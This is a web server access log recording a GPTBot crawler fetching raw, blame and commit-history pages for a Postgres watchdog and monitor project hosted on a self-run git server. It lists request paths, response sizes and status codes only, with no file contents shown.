74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 6721] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" -[17/Feb/2026:13:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212038] [Gzip 17.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 21608] [Gzip 12.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" -[17/Feb/2026:13:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 872716] [Gzip 23.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12071] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 55987] [Gzip 36.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" -[17/Feb/2026:13:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 45179] [Gzip 9.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" -[17/Feb/2026:13:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9902] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" -[17/Feb/2026:13:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 5415] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:13:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 31682] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" -[17/Feb/2026:13:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 11103] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" -[17/Feb/2026:13:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" -[17/Feb/2026:13:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:13:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10900] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" -[17/Feb/2026:13:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16593] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29881] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 29273] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 10969] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 12356] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 12089] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15779] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:13:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" -[17/Feb/2026:13:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" -[17/Feb/2026:13:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10170] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9511] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:13:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" -[17/Feb/2026:13:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 11623] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:13:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 11429] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" -[17/Feb/2026:13:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:13:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17379] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10423] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42724] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" -[17/Feb/2026:13:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 17003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:13:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" -[17/Feb/2026:13:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" -[17/Feb/2026:13:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 9907] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" -[17/Feb/2026:13:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 35046] [Gzip 15.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:13:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" -[17/Feb/2026:13:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 764] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:13:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] 